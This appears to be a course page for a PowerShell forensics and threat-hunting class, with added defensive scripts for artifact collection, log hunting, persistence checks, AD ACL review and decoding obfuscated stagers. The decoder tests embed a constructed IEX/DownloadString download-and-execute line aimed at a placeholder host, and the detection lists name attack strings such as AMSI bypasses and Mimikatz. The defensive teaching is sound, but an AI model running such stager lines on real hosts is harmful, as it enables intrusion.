Masterclass: PowerShell for Digital Investigation & Threat Hunting

During this intensive 5-day course you will gain practical cybersecurity knowledge and skills in using PowerShell for digital investigation and threat hunting.

You´ll be able to:

  • Get the highest quality and unique learning experience – the class is limited to 20 participants by default.
  • Get the opportunity to interact with our world-renowned Experts.
  • Go through CQURE’s custom lab exercises and practice them after the course.
  • Receive a lifelong certification after completing the course!

Why this course?

This is an international Live Virtual Class where you will be able to share the learning experience with a group of IT pros from around the world without leaving your home or office! The class is taught fully remotely in English by CQURE Cybersecurity Experts. In order to ensure the highest quality and a unique learning experience, the course is limited to 16 participants by default, or supported by an assistant instructor if the number of delegates exceeds 16. During this course, you will have the opportunity to go through CQURE's custom lab exercises, interact with our world-renowned Experts and receive a lifelong certification after completing the course!

Target Audience

This course is designed for security professionals across defensive, offensive and hybrid roles: security analysts, threat hunters, SOC teams and incident responders who need to collect evidence and hunt for threats on Windows systems; red and purple teamers who want to understand how their PowerShell tradecraft shows up in logs and artifacts; and security engineers, IT administrators and systems engineers who automate collection and detection across the enterprise. Prior experience with Windows infrastructure and basic PowerShell is recommended; knowledge of Active Directory and IT security is an advantage.


This Live Virtual Class consists of 12 modules on PowerShell for Digital Investigation & Threat Hunting. Each module combines essential theory with individual practice during the exercises, along with plenty of hands-on tools and real-case scenarios.

Module 1. APT Attacks & Investigation

  1. Understanding advanced persistent threats (APTs)
  2. Attacker tactics, techniques & procedures (MITRE ATT&CK)
  3. APT attack vectors
  4. Real-world scenario: a targeted ransomware attack

Module 2. PowerShell 101 for Blue Teams

  1. PowerShell syntax and scripting basics
  2. Cmdlets, pipelines, and execution policies
  3. Profiles and security configurations
  4. Condition Statements & Loops

Module 3. Understanding information gathering and timelining

  1. The main goals of digital forensics and timeline analysis
  2. Deep Dive into NTFS Artifacts for Hidden Malware Files
  3. Analyzing Prefetch files to detect executed programs
  4. Extracting Timestamps from Master File Table (MFT)
  5. Hunting Deleted Malware Files via $LogFile & $UsnJrnl

Module 4. PowerShell For Digital Forensics & Artifacts Collection

  1. File and directory enumeration
  2. File metadata and alternate data streams
  3. Hashing and comparing files
  4. Timestamp analysis
  5. Accessing registry keys and values
  6. Run keys & Shellbags
  7. Parsing with PowerShell scripts
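As an added illustration of the techniques Module 4 lists (example code written for this page, not CQURE's lab material), the following script collects file metadata, SHA-256 hashes and alternate data streams from one directory and reviews the Run/RunOnce autostart keys, using only built-in cmdlets. The target directory and output path are assumptions.

```powershell
# Added example, not CQURE course material. Quick-triage collection of file and
# registry artifacts with built-in cmdlets only (Windows PowerShell 5.1 or later).
# $TargetDir and $OutFile are assumptions; point them at the system under review.

$TargetDir = "$env:USERPROFILE\Downloads"
$OutFile   = "$env:TEMP\triage-files.csv"

# 1. Enumerate files with timestamps, SHA-256 and alternate data streams.
#    Zone.Identifier is the Mark-of-the-Web stream written by browsers and mail
#    clients; any other named stream on an executable deserves a closer look.
$files = Get-ChildItem -LiteralPath $TargetDir -File -Recurse -Force -ErrorAction SilentlyContinue |
    ForEach-Object {
        $f = $_
        $streams = @(Get-Item -LiteralPath $f.FullName -Stream * -ErrorAction SilentlyContinue |
            Where-Object { $_.Stream -ne ':$DATA' } |
            Select-Object -ExpandProperty Stream)
        $hash = (Get-FileHash -LiteralPath $f.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash
        [pscustomobject]@{
            Path        = $f.FullName
            SizeBytes   = $f.Length
            CreatedUtc  = $f.CreationTimeUtc
            ModifiedUtc = $f.LastWriteTimeUtc
            AccessedUtc = $f.LastAccessTimeUtc
            SHA256      = $hash
            AltStreams  = ($streams -join ';')
            # $STANDARD_INFORMATION timestamps are trivial to forge. A file "modified"
            # before it was "created" is a cheap timestomping indicator, but it is also
            # what a plain file copy produces, so treat it as a prompt, not a verdict.
            ModifiedBeforeCreated = ($f.LastWriteTimeUtc -lt $f.CreationTimeUtc)
        }
    }
$files | Export-Csv -LiteralPath $OutFile -NoTypeInformation

# 2. Show the download origin recorded in Zone.Identifier, where present.
$files | Where-Object { $_.AltStreams -match 'Zone\.Identifier' } | ForEach-Object {
    $zone = Get-Content -LiteralPath $_.Path -Stream Zone.Identifier -ErrorAction SilentlyContinue
    [pscustomobject]@{ Path = $_.Path; ZoneIdentifier = ($zone -join ' | ') }
}

# 3. Autostart entries in the Run/RunOnce keys of the machine and the current user.
$runKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
)
foreach ($key in $runKeys) {
    if (-not (Test-Path -LiteralPath $key)) { continue }
    $item = Get-Item -LiteralPath $key
    foreach ($name in $item.GetValueNames()) {
        $cmd = [string]$item.GetValue($name)
        [pscustomobject]@{
            Key        = $key
            ValueName  = $name
            Command    = $cmd
            # Red flags: user-writable locations, script hosts, encoded PowerShell.
            Suspicious = ($cmd -match '\\(AppData|Temp|ProgramData|Users\\Public)\\' -or
                          $cmd -match '(powershell|pwsh|wscript|cscript|mshta|rundll32|regsvr32)' -or
                          $cmd -match '-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}')
        }
    }
}
```

HKCU only covers the account running the script; to review other users' Run keys, load their NTUSER.DAT hives under HKU first and add the matching HKU:\<SID>\... paths to the list.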

Module 5. Process & Network Artifact Collection

  1. Mapping parent-child process relationships with PowerShell
  2. Verifying Process Signatures using PowerShell
  3. Command line auditing
  4. Detecting Malicious Loaded Libraries (DLLs)
  5. Network session monitoring (TCP/UDP)
  6. Netstat, Get-NetTCPConnection, and equivalents
  7. Dumping process memory using PowerShell
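The process and network collection Module 5 describes, as an added example written for this page (not CQURE's lab material): a snapshot of running processes with parent/child links, Authenticode status and the sockets each process owns, using built-in cmdlets only. The list of expected parents for core system processes is an assumption based on a default Windows 10/11 layout.

```powershell
# Added example, not CQURE course material. Snapshot of running processes with
# parent/child links, Authenticode status and network endpoints. Run from an
# elevated prompt so protected processes and all sockets are visible.

# Win32_Process carries ParentProcessId and CommandLine; Get-Process does not.
$procs = Get-CimInstance -ClassName Win32_Process |
    Select-Object ProcessId, ParentProcessId, Name, ExecutablePath, CommandLine

# Index by PID. Caveat: PIDs are reused, so a "parent" that exited before the
# child may now be a different, unrelated process.
$byPid = @{}
foreach ($p in $procs) { $byPid[[int]$p.ProcessId] = $p }

# Verify each binary once; Status is Valid, NotSigned, HashMismatch, etc.
$sigCache = @{}
function Get-SignerStatus([string]$Path) {
    if ([string]::IsNullOrEmpty($Path)) { return 'NoPath' }
    if (-not $sigCache.ContainsKey($Path)) {
        $s = Get-AuthenticodeSignature -FilePath $Path -ErrorAction SilentlyContinue
        $sigCache[$Path] = if ($s) { "$($s.Status) $($s.SignerCertificate.Subject)".Trim() } else { 'Unreadable' }
    }
    return $sigCache[$Path]
}

# Expected parents for core system processes (assumption: default Windows 10/11).
$expectedParent = @{
    'svchost.exe'  = @('services.exe')
    'services.exe' = @('wininit.exe')
    'lsass.exe'    = @('wininit.exe')
    'csrss.exe'    = @('smss.exe')
}

$report = foreach ($p in $procs) {
    $parent     = $byPid[[int]$p.ParentProcessId]
    $parentName = if ($parent) { $parent.Name } else { '<exited>' }
    $flags = @()
    if ($expectedParent.ContainsKey($p.Name) -and $parentName -notin $expectedParent[$p.Name]) {
        $flags += "unexpected-parent:$parentName"
    }
    # Office or browser spawning a script host is a classic initial-access chain.
    if ($parentName -match '^(winword|excel|outlook|powerpnt|chrome|msedge|firefox)\.exe$' -and
        $p.Name -match '^(powershell|pwsh|cmd|wscript|cscript|mshta|rundll32|regsvr32)\.exe$') {
        $flags += 'script-host-from-office-or-browser'
    }
    if ($p.CommandLine -match '-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}') { $flags += 'encoded-command' }
    [pscustomobject]@{
        PID         = $p.ProcessId
        PPID        = $p.ParentProcessId
        Name        = $p.Name
        Parent      = $parentName
        Signature   = Get-SignerStatus $p.ExecutablePath
        Flags       = ($flags -join ',')
        CommandLine = $p.CommandLine
    }
}
# Show anything flagged or not carrying a valid signature.
$report | Where-Object { $_.Flags -or $_.Signature -notmatch '^Valid' } | Format-Table -AutoSize -Wrap

# Network endpoints joined to the owning process. Get-NetTCPConnection and
# Get-NetUDPEndpoint are the PowerShell equivalents of "netstat -ano".
$net = @(Get-NetTCPConnection | ForEach-Object {
    [pscustomobject]@{
        Proto   = 'TCP'
        Local   = "$($_.LocalAddress):$($_.LocalPort)"
        Remote  = "$($_.RemoteAddress):$($_.RemotePort)"
        State   = [string]$_.State
        PID     = $_.OwningProcess
        Process = $byPid[[int]$_.OwningProcess].Name
    }
}) + @(Get-NetUDPEndpoint | ForEach-Object {
    [pscustomobject]@{
        Proto   = 'UDP'
        Local   = "$($_.LocalAddress):$($_.LocalPort)"
        Remote  = '-'
        State   = 'Bound'
        PID     = $_.OwningProcess
        Process = $byPid[[int]$_.OwningProcess].Name
    }
})
$net | Sort-Object Process, Proto, State | Format-Table -AutoSize
```

A "Valid" signature only says the file on disk is intact and signed by a chain the host trusts; it says nothing about what was injected into the process afterwards, which is why the module pairs signature checks with loaded-DLL review and memory dumps.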

Module 6. PowerShell Logging & Detection

  1. PowerShell event logging (Event ID 4104 script block logging, 4688 process creation, etc.)
  2. Windows Event Log queries
  3. Using script block logging to detect encoded and obfuscated commands
  4. Using Sigma rules with PowerShell to detect suspicious activities
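The logging and detection techniques listed in Module 6, as an added example written for this page (not CQURE's lab material): it pulls 4104 script block events and 4688 process creation events from the last 24 hours, decodes -EncodedCommand arguments and flags content that warrants a look. The indicator list is an assumption, and the command line at the end is constructed for an offline check of the decoder.

```powershell
# Added example, not CQURE course material. Query 4104/4688, decode encoded
# commands and flag suspicious content. Assumes script block logging and
# "Include command line in process creation events" are enabled on the host.

$since = (Get-Date).AddHours(-24)

# -EncodedCommand takes Base64 of UTF-16LE text, not UTF-8.
function ConvertFrom-EncodedCommand([string]$CommandLine) {
    if ($CommandLine -match '-e(c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})') {
        try { return [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[2])) }
        catch { return '<base64 decode failed>' }
    }
    return $null
}

# Flatten an event's <EventData><Data Name=...> elements into a hashtable.
function Get-EventData($Event) {
    $x = [xml]$Event.ToXml()
    $d = @{}
    foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
    return $d
}

# Indicators that justify a closer look; none of them is a verdict on its own (assumption).
$suspicious = @(
    'FromBase64String', 'DownloadString', 'DownloadFile', 'Invoke-Expression', '\bIEX\b',
    'Net\.WebClient', 'Invoke-WebRequest', 'Start-BitsTransfer', '-w(indowstyle)?\s+hidden',
    '-nop\b', 'AmsiUtils', 'amsiInitFailed', 'Add-MpPreference', 'VirtualAlloc',
    'Invoke-Mimikatz', 'Reflection\.Assembly', 'Invoke-ReflectivePEInjection'
) -join '|'

# 4104 lives in Microsoft-Windows-PowerShell/Operational. Long scripts are split
# across several events; ScriptBlockId plus MessageNumber/MessageTotal tie them together.
$blocks = Get-WinEvent -FilterHashtable @{
    LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104; StartTime = $since
} -ErrorAction SilentlyContinue | ForEach-Object {
    $d = Get-EventData $_
    [pscustomobject]@{
        Time          = $_.TimeCreated
        ScriptBlockId = $d['ScriptBlockId']
        Part          = "$($d['MessageNumber'])/$($d['MessageTotal'])"
        Path          = $d['Path']
        Text          = $d['ScriptBlockText']
    }
}
"--- 4104 script blocks with suspicious content ---"
$blocks | Where-Object { $_.Text -match $suspicious } |
    Select-Object Time, ScriptBlockId, Part, Path,
        @{ n = 'Snippet'; e = { $_.Text.Substring(0, [Math]::Min(120, $_.Text.Length)) } } |
    Format-Table -AutoSize -Wrap

# 4688 is in the Security log. CommandLine stays empty unless the audit policy
# "Include command line in process creation events" is on.
"--- 4688 process creations carrying an encoded command ---"
Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688; StartTime = $since } -ErrorAction SilentlyContinue |
    ForEach-Object {
        $d = Get-EventData $_
        $decoded = ConvertFrom-EncodedCommand $d['CommandLine']
        if ($decoded) {
            [pscustomobject]@{
                Time    = $_.TimeCreated
                User    = $d['SubjectUserName']
                Parent  = $d['ParentProcessName']
                Process = $d['NewProcessName']
                Decoded = $decoded
                Flagged = [bool]($decoded -match $suspicious)
            }
        }
    } | Format-List

# Offline check of the decoder with a constructed command line (not a real capture).
$payload = 'IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/a.ps1")'
$sample  = 'powershell.exe -nop -w hidden -enc ' +
           [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))
$decoded = ConvertFrom-EncodedCommand $sample
"Decoded: $decoded"
"Flagged: $($decoded -match $suspicious)"
```

Script block logging records the de-obfuscated code as the engine sees it, so an encoded command shows up decoded in 4104 even when 4688 only carries the Base64 blob; comparing the two is a quick way to confirm the audit policy is actually in effect.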

Module 7. Threat Hunting with WMI & Scheduled Tasks

  1. Querying WMI for suspicious activity
  2. Identifying attacker persistence via scheduled tasks
  3. Script-based detection of anomalies
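The persistence hunting Module 7 covers, as an added example written for this page (not CQURE's lab material): enumerate WMI permanent event subscriptions and scheduled tasks and flag the patterns attackers rely on. The flagging heuristics are assumptions to tune per environment.

```powershell
# Added example, not CQURE course material. Enumerate WMI permanent event
# subscriptions and scheduled tasks and flag persistence patterns. Built-in
# cmdlets only; run elevated to see every task.

# 1. WMI subscriptions: an __EventFilter (WQL trigger) bound to an __EventConsumer
#    (the action). A stock Windows install carries a benign "SCM Event Log Filter"
#    bound to an NTEventLogEventConsumer; CommandLine and ActiveScript consumers
#    are the ones malware uses and the ones to scrutinize.
$ns = 'root\subscription'
$filters   = @(Get-CimInstance -Namespace $ns -ClassName __EventFilter)
$consumers = @(Get-CimInstance -Namespace $ns -ClassName __EventConsumer)
$bindings  = @(Get-CimInstance -Namespace $ns -ClassName __FilterToConsumerBinding)

$wmiReport = foreach ($b in $bindings) {
    # Filter and Consumer are object references; resolve them by Name.
    $f = $filters   | Where-Object { $_.Name -eq $b.Filter.Name }   | Select-Object -First 1
    $c = $consumers | Where-Object { $_.Name -eq $b.Consumer.Name } | Select-Object -First 1
    $type = if ($c) { $c.CimClass.CimClassName } else { '<missing>' }
    $payload = switch ($type) {
        'CommandLineEventConsumer'  { $c.CommandLineTemplate }
        'ActiveScriptEventConsumer' { if ($c.ScriptText) { $c.ScriptText } else { $c.ScriptFileName } }
        default                     { '' }
    }
    [pscustomobject]@{
        Filter       = if ($f) { $f.Name } else { '<missing>' }
        Query        = if ($f) { $f.Query } else { '' }
        ConsumerType = $type
        Consumer     = $b.Consumer.Name
        Payload      = $payload
        Suspicious   = ($type -in 'CommandLineEventConsumer', 'ActiveScriptEventConsumer')
    }
}
"--- WMI filter -> consumer bindings ---"
$wmiReport | Format-List

# 2. Scheduled tasks: inspect what each action runs, not only the task name.
"--- Scheduled tasks with suspicious actions ---"
Get-ScheduledTask | ForEach-Object {
    $t = $_
    foreach ($a in $t.Actions) {
        $exe    = [string]$a.Execute        # empty for COM-handler actions
        $argStr = [string]$a.Arguments
        $cmd    = "$exe $argStr".Trim()
        $flags  = @()
        if ($cmd -match '\\(AppData|Temp|ProgramData|Users\\Public)\\') { $flags += 'user-writable-path' }
        if ($exe -match '(powershell|pwsh|cmd|wscript|cscript|mshta|rundll32|regsvr32|certutil|bitsadmin)') { $flags += 'script-host-or-lolbin' }
        if ($argStr -match '-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}') { $flags += 'encoded-command' }
        if ($t.Principal.RunLevel -eq 'Highest' -and $t.TaskPath -notmatch '^\\Microsoft\\') { $flags += 'highest-privilege-non-microsoft' }
        if ($flags.Count -gt 0) {
            [pscustomobject]@{
                Task   = "$($t.TaskPath)$($t.TaskName)"
                Author = $t.Author
                State  = [string]$t.State
                Action = $cmd
                Flags  = ($flags -join ',')
            }
        }
    }
} | Format-Table -AutoSize -Wrap
```

Attackers also hide tasks by deleting the task's Security Descriptor value or its Index entry under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache, in which case Get-ScheduledTask will not list them; compare the TaskCache\Tasks GUIDs against the cmdlet output when a host looks clean but the timeline says otherwise.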

Module 8. PowerShell For Enterprise

  1. PowerShell Remoting For Secure Data Collection & Analysis
  2. Execute Commands & Scripts Across The Enterprise
  3. Utilize Digital Forensics Tools & Libraries Like Kansa & KAPE
  4. Securing remoting connections against credential theft
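The enterprise-scale collection Module 8 describes, as an added example written for this page (not CQURE's lab material, and not Kansa or KAPE): plain PowerShell Remoting fanned out over a host list, with a read-only collector that returns objects for central hunting. The host list file, time window and corporate IP range are assumptions.

```powershell
# Added example, not CQURE course material. Fan-out artifact collection over WinRM.
# Assumptions: hosts.txt holds one FQDN per line (FQDNs let Kerberos work), the
# caller is a domain account with remote admin rights, and WinRM is enabled.
# Kerberos with a network logon leaves no reusable credential on the target;
# CredSSP or Basic authentication would, so neither is used here.

$computers = Get-Content -LiteralPath "$env:USERPROFILE\hosts.txt"
$since     = (Get-Date).AddHours(-24)

# The collector runs on each target and returns objects, not text, so filtering
# and joining happen centrally. It is read-only: nothing is written on the host.
$collector = {
    param([datetime]$Since)
    [pscustomobject]@{
        Host         = $env:COMPUTERNAME
        Collected    = (Get-Date).ToUniversalTime()
        Processes    = @(Get-CimInstance -ClassName Win32_Process |
                         Select-Object ProcessId, ParentProcessId, Name, CommandLine)
        Logons       = @(Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4624; StartTime = $Since } -ErrorAction SilentlyContinue |
                         ForEach-Object {
                             $x = [xml]$_.ToXml(); $d = @{}
                             foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
                             [pscustomobject]@{ Time = $_.TimeCreated; User = $d['TargetUserName']; Type = $d['LogonType']; From = $d['IpAddress'] }
                         })
        ScriptBlocks = @(Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104; StartTime = $Since } -ErrorAction SilentlyContinue |
                         Select-Object TimeCreated, Message)
    }
}

$opts = New-PSSessionOption -NoMachineProfile -OpenTimeout 15000 -OperationTimeout 180000
$sessions = New-PSSession -ComputerName $computers -Authentication Kerberos -SessionOption $opts `
            -ErrorAction SilentlyContinue -ErrorVariable connErrors
$connErrors | ForEach-Object { Write-Warning "Could not connect: $($_.Exception.Message)" }

try {
    $results = Invoke-Command -Session $sessions -ScriptBlock $collector -ArgumentList $since -ThrottleLimit 32
} finally {
    $sessions | Remove-PSSession
}

# Keep the raw collection, then hunt across hosts.
$results | Export-Clixml -LiteralPath "$env:TEMP\collection-$(Get-Date -Format yyyyMMdd-HHmm).xml"

# Example hunts: encoded PowerShell anywhere, and network logons (type 3) from
# outside the corporate range (10.0.0.0/8 is an assumption).
foreach ($r in $results) {
    $r.Processes | Where-Object { $_.CommandLine -match '-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}' } |
        Select-Object @{ n = 'Host'; e = { $r.Host } }, ProcessId, Name, CommandLine
    $r.Logons | Where-Object { $_.Type -eq '3' -and $_.From -notmatch '^(10\.|127\.|-$)' } |
        Select-Object @{ n = 'Host'; e = { $r.Host } }, Time, User, From
}
```

Running the collection from a dedicated, hardened analysis host matters as much as the authentication choice: if the workstation that holds the sessions is compromised, every target it can reach is reachable by the attacker too.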

Module 9. Hands-On Threat Hunting Case Study

  1. Detecting LOLBins and encoded PowerShell
  2. Hands-on lab: analyzing logs and artifacts
  3. Practical attacker techniques walkthrough

Module 10. Active Directory Enumeration with PowerShell

  1. Domain enumeration techniques
  2. AD object and group discovery
  3. Trust relationships and policies
  4. Detecting Lateral Movement Possibilities with Weak ACLs
  5. Intro to Azure AD (Microsoft Entra ID) enumeration for privilege escalation
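The weak-ACL check from Module 10, as an added example written for this page (not CQURE's lab material): it reads the ACLs of a handful of high-value Active Directory objects with the RSAT ActiveDirectory module and reports ACEs that hand control to principals who should not hold it, including the replication rights that make DCSync possible. The target list and the trusted-principal pattern are assumptions to tune per environment.

```powershell
# Added example, not CQURE course material. Find dangerous ACEs on high-value AD
# objects. Needs the RSAT ActiveDirectory module on a domain-joined host.
Import-Module ActiveDirectory

$domain  = Get-ADDomain
$dn      = $domain.DistinguishedName
$targets = @(
    $dn,                                              # domain root: replication rights here = DCSync
    "CN=AdminSDHolder,CN=System,$dn",                 # template ACL stamped onto protected groups
    "OU=Domain Controllers,$dn",
    (Get-ADGroup -Identity 'Domain Admins').DistinguishedName
)

# Well-known extended-right GUIDs that together allow DCSync.
$replicationRights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
}
# Principals expected to hold powerful rights (assumption; -match is case-insensitive).
$trusted = '^(NT AUTHORITY\\SYSTEM|BUILTIN\\Administrators|NT AUTHORITY\\ENTERPRISE DOMAIN CONTROLLERS|' +
           '.+\\(Domain Admins|Enterprise Admins|Administrators|Domain Controllers))$'

$findings = foreach ($target in $targets) {
    $acl = Get-Acl -Path "AD:\$target"
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        $who = $ace.IdentityReference.Value
        if ($who -match $trusted) { continue }
        $rights     = $ace.ActiveDirectoryRights.ToString()
        $unscoped   = ($ace.ObjectType -eq [guid]::Empty)     # all attributes / all extended rights
        $replRight  = $replicationRights[$ace.ObjectType.ToString()]
        # Takeover rights are dangerous regardless of scope; WriteProperty/ExtendedRight
        # only when unscoped or when scoped to a replication right.
        $takeover   = $rights -match 'GenericAll|WriteDacl|WriteOwner|GenericWrite'
        $broadWrite = ($rights -match 'WriteProperty|ExtendedRight') -and ($unscoped -or $replRight)
        if (-not ($takeover -or $broadWrite)) { continue }
        [pscustomobject]@{
            Object    = $target
            Principal = $who
            Rights    = $rights
            Scope     = if ($replRight) { $replRight } elseif ($unscoped) { 'whole object' } else { $ace.ObjectType.ToString() }
            Inherited = $ace.IsInherited
        }
    }
}
$findings | Sort-Object Object, Principal | Format-Table -AutoSize -Wrap
```

Expect some legitimate hits, for example Exchange or backup service groups with replication or write rights on the domain root; the point of the exercise is to know exactly which non-admin principals can reach Domain Admins, because each of them is a lateral movement path an attacker can use without touching a single password.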

Module 11. Red Teaming Tactics with PowerShell

  1. AMSI bypasses, obfuscation, and logging evasion
  2. Attack path simulation and detection using Atomic Red Team (Purple Teaming)
  3. Living-off-the-land tools and script evasion
  4. PowerShell Without PowerShell For Defense Evasion

Module 12. Complete Fileless Attack Analysis Walkthrough

  1. Analyzing an obfuscated PowerShell first stage
  2. Handling Encryption, Compression & Encoding Algorithms For Script Analysis
  3. Investigate Process Injection In PowerShell
  4. Summary, wrap-up, and Final Report
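The layered decoding Module 12 walks through, as an added example written for this page (not CQURE's lab material): peel the encoding and compression layers of a PowerShell first stage without ever executing it. The stager at the top is constructed for the demo (an -EncodedCommand wrapper around the usual IEX/StreamReader/GzipStream boilerplate around a Base64 blob); it is not a real sample.

```powershell
# Added example, not CQURE course material. Static unwrapping of a multi-layer
# PowerShell stager: find the largest Base64 blob, decode it, decompress it if
# it is Gzip or raw Deflate, and repeat until nothing decodable is left.

# --- constructed sample (not a real capture) -------------------------------
$finalStage = 'IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/stage2")'
$ms = New-Object IO.MemoryStream
$gz = New-Object IO.Compression.GzipStream($ms, [IO.Compression.CompressionMode]::Compress)
$bytes = [Text.Encoding]::UTF8.GetBytes($finalStage)
$gz.Write($bytes, 0, $bytes.Length); $gz.Close()
$blob   = [Convert]::ToBase64String($ms.ToArray())
$layer1 = "IEX (New-Object IO.StreamReader((New-Object IO.Compression.GzipStream([IO.MemoryStream][Convert]::FromBase64String('$blob'),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::UTF8)).ReadToEnd()"
$stage1 = 'powershell -nop -w hidden -enc ' + [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($layer1))
# ---------------------------------------------------------------------------

# Decompress Gzip (magic 1f 8b) or raw Deflate (no magic; BTYPE bits of the first
# byte must be 01 or 10). Returns $null when the bytes are not a compressed stream.
function Expand-Compressed([byte[]]$Data) {
    if ($Data.Length -lt 4) { return $null }
    $isGzip = ($Data[0] -eq 0x1f -and $Data[1] -eq 0x8b)
    $btype  = ($Data[0] -shr 1) -band 3
    if (-not $isGzip -and $btype -notin 1, 2) { return $null }
    try {
        $in  = New-Object IO.MemoryStream(,$Data)
        $st  = if ($isGzip) { New-Object IO.Compression.GzipStream($in, [IO.Compression.CompressionMode]::Decompress) }
               else         { New-Object IO.Compression.DeflateStream($in, [IO.Compression.CompressionMode]::Decompress) }
        $out = New-Object IO.MemoryStream
        $st.CopyTo($out); $st.Dispose()
        if ($out.Length -gt 0) { return ,$out.ToArray() }
    } catch { }
    return $null
}

# -EncodedCommand payloads are UTF-16LE; most inner layers are UTF-8.
function ConvertTo-Text([byte[]]$Data) {
    $looksUtf16 = ($Data.Length -ge 4) -and ($Data[1] -eq 0) -and ($Data[3] -eq 0)
    if ($looksUtf16) { [Text.Encoding]::Unicode.GetString($Data) } else { [Text.Encoding]::UTF8.GetString($Data) }
}

# Reject decodes that are mostly non-printable: garbage, or a binary payload.
function Test-Printable([string]$s) {
    if (-not $s) { return $false }
    $bad = ([regex]::Matches($s, '[^\x09\x0A\x0D\x20-\x7E]')).Count
    return ($bad / $s.Length) -lt 0.05
}

function Get-StageLayers([string]$Text, [int]$MaxLayers = 10) {
    $layers = @()
    for ($i = 1; $i -le $MaxLayers; $i++) {
        $m = [regex]::Matches($Text, '[A-Za-z0-9+/]{40,}={0,2}') | Sort-Object Length -Descending | Select-Object -First 1
        if (-not $m) { break }
        try { $raw = [Convert]::FromBase64String($m.Value) } catch { break }
        $text = $null; $enc = $null
        $decomp = Expand-Compressed $raw
        if ($decomp) { $t = ConvertTo-Text $decomp; if (Test-Printable $t) { $text = $t; $enc = 'base64+compressed' } }
        if (-not $text) { $t = ConvertTo-Text $raw; if (Test-Printable $t) { $text = $t; $enc = 'base64' } }
        if (-not $text) {
            # Binary payload (shellcode, a PE, or ciphertext that needs its key): stop here.
            $preview = ($raw[0..7] | ForEach-Object { $_.ToString('x2') }) -join ' '
            $layers += [pscustomobject]@{ Layer = $i; Encoding = 'base64 -> binary'; Text = "$($raw.Length) bytes, starts $preview" }
            break
        }
        $layers += [pscustomobject]@{ Layer = $i; Encoding = $enc; Text = $text }
        $Text = $text
    }
    return $layers
}

Get-StageLayers $stage1 | Format-List
```

Each recovered layer is returned as an object with its number, the encoding that was peeled and the resulting text, which is what goes into the final report. Real stagers add XOR or AES layers, character-code arrays and string reversal on top; the same loop extends to those once the key or transform is identified from the surrounding code, which is the part that must be read, not run.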

Certification

After finishing the course, you will be granted a CQURE Certificate of Completion. Please note that after completing the course you will also be eligible for CPE points!


FAQ – Masterclass: PowerShell for Digital Investigation & Threat Hunting

How much does the course cost?
The price is 39 900 NOK for 5 days. The course includes course material, hands-on lab exercises and a lifelong certification after completing the course.

How long does the course last?
The course runs over 5 intensive days from 09:00 to 16:00 each day and is delivered as an international Live Virtual Class.

How is the course delivered?
The course is delivered as a live virtual class led by CQURE's cybersecurity experts. Participants work in hands-on lab environments and learn to use PowerShell for digital investigation, threat hunting and security analysis in realistic scenarios.

Who is the course for?
The course is designed for technical security professionals working with incident response and threat detection, including:

  • Security analysts
  • Threat hunters
  • SOC teams
  • Incident responders
  • Red team and purple team specialists
  • Security engineers
  • IT administrators and systems engineers

What will I learn during the course?
You will learn how PowerShell can be used to collect evidence, analyze attacks and detect advanced threats in Windows environments. After the course you will be able to:

  • Perform digital investigations with PowerShell
  • Analyze system artifacts and incident timelines
  • Collect and analyze process and network data
  • Detect malicious PowerShell scripts and fileless attacks
  • Carry out threat hunting in Active Directory environments
  • Automate analysis and investigation in enterprise environments

Is the course hands-on?
Yes. The course contains extensive hands-on lab exercises in which participants analyze realistic attack scenarios, collect system artifacts and carry out threat hunting using PowerShell.

Which topics are covered in the course?
The course covers, among other things:

  • APT attacks and the MITRE ATT&CK framework
  • PowerShell scripting for security analysis
  • Digital forensics and artifact collection
  • Analysis of file system artifacts and timelines
  • Process and network analysis
  • PowerShell logging and detection of malicious scripts
  • Threat hunting with WMI and scheduled tasks
  • Enterprise threat hunting with PowerShell Remoting
  • Active Directory and Azure AD enumeration
  • Red team techniques and fileless attacks

Do I receive a certification after the course?
Yes. After completing the course you receive a lifelong certification documenting competence in digital investigation and threat hunting with PowerShell.

What prior knowledge is recommended?
Participants are recommended to have experience with Windows infrastructure and basic PowerShell. Knowledge of Active Directory and IT security is an advantage.

What makes this course unique?
The course combines digital investigation, threat hunting and automation using PowerShell. You learn how modern security teams use PowerShell to analyze attacks, collect evidence and detect advanced threats in large enterprise environments.